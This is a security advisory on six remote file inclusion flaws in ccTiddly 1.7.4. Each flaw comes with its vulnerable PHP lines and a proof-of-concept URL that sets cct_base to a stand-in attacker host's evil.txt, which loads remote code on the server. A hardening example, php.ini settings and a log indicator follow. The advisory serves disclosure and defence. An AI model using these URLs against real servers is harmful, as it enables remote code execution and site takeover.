ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
Source: www.vfcocus.net   Author: cOndemned   Published: 2008-12-05
/*

$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
found by cOndemned

download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip

Probably prior versions are vulnerable too...

Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
file :
/index.php
poc :
http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
source (lines 18-23) :

//includes
if(!isset($cct_base))
$cct_base = "";

include_once($cct_base."includes/header.php");
include_once($cct_base."includes/login.php");

0x02 :

file :
/handle/proxy.php
poc :
http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
source (lines 3-6) :

if(!isset($cct_base))
$cct_base = "../";
include_once($cct_base."includes/header.php");
include_once($cct_base."includes/config.php");

0x03 :

file :
/includes/header.php
poc :
http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
source (lines 5-13) :

if(!isset($cct_base))
$cct_base = "";
include_once($cct_base."includes/functions.php");
include_once($cct_base."includes/config.php");
include_once($cct_base."includes/pluginLoader.php");
include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
//include is used because language file is included once in config.php file
include_once($cct_base."includes/tiddler.php");
include_once($cct_base."includes/user.php");

0x04 :

file :
/includes/include.php
poc :
http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
source (line 3) :

include_once($cct_base."includes/ccAssignments.php");

0x05 :

file :
/includes/workspace.php
poc :
http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
source (lines 3-5) :

include_once($cct_base."includes/header.php");
include_once($cct_base."includes/user.php");
include_once($cct_base."includes/tiddler.php");

0x06 :

file :
/plugins/RSS/files/rss.php
poc :
http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
source (line 3) :

include_once($cct_base."includes/header.php");
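
All six entries share one root cause: the include path is built from $cct_base, which is either never initialised or only given a default when it is unset, so with register_globals and URL includes enabled in the PHP configuration a request parameter of the same name can replace it. The following is an added example of how such an includes/header.php could be hardened, written for this page and not taken from ccTiddly; CCT_BASE, cct_safe_include() and cct_language_file() are names assumed here, and the language-code format is assumed to be two letters with an optional region suffix.

```php
<?php
// Added example (not ccTiddly's code): the include base is derived from this
// file's own location, never from request data. This file is assumed to live
// in includes/, so the application root is one directory up.
define('CCT_BASE', realpath(__DIR__ . '/..') . '/');

// Only these relative include names are ever passed to include_once.
$cct_allowed_includes = array(
    'includes/functions.php',
    'includes/config.php',
    'includes/pluginLoader.php',
    'includes/tiddler.php',
    'includes/user.php',
);

function cct_safe_include($relative)
{
    global $cct_allowed_includes;
    if (!in_array($relative, $cct_allowed_includes, true)) {
        throw new RuntimeException('include not allowed: ' . $relative);
    }
    // realpath() resolves symlinks and '..'; the result must stay under
    // CCT_BASE, so a URL or a path outside the tree can never be included.
    $path = realpath(CCT_BASE . $relative);
    if ($path === false || strpos($path, CCT_BASE) !== 0) {
        throw new RuntimeException('include outside base: ' . $relative);
    }
    include_once $path;
}

// The language code comes from $tiddlyCfg, but it is validated anyway so that
// a tampered config value cannot smuggle '/', '..' or a URL scheme into the path.
function cct_language_file($language)
{
    if (!preg_match('/^[A-Za-z]{2}(-[A-Za-z]{2})?$/', $language)) {
        throw new RuntimeException('bad language code');
    }
    return CCT_BASE . 'lang/' . $language . '/language.php';
}

cct_safe_include('includes/functions.php');
cct_safe_include('includes/config.php');
cct_safe_include('includes/pluginLoader.php');
include_once cct_language_file($tiddlyCfg['pref']['language']);
cct_safe_include('includes/tiddler.php');
cct_safe_include('includes/user.php');
```

Independently of the code change, register_globals=Off and allow_url_include=Off in php.ini remove the preconditions for this class of bug, and a web server log entry carrying cct_base=http is a reliable indicator of an attempt against the unpatched version.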

EoF.

 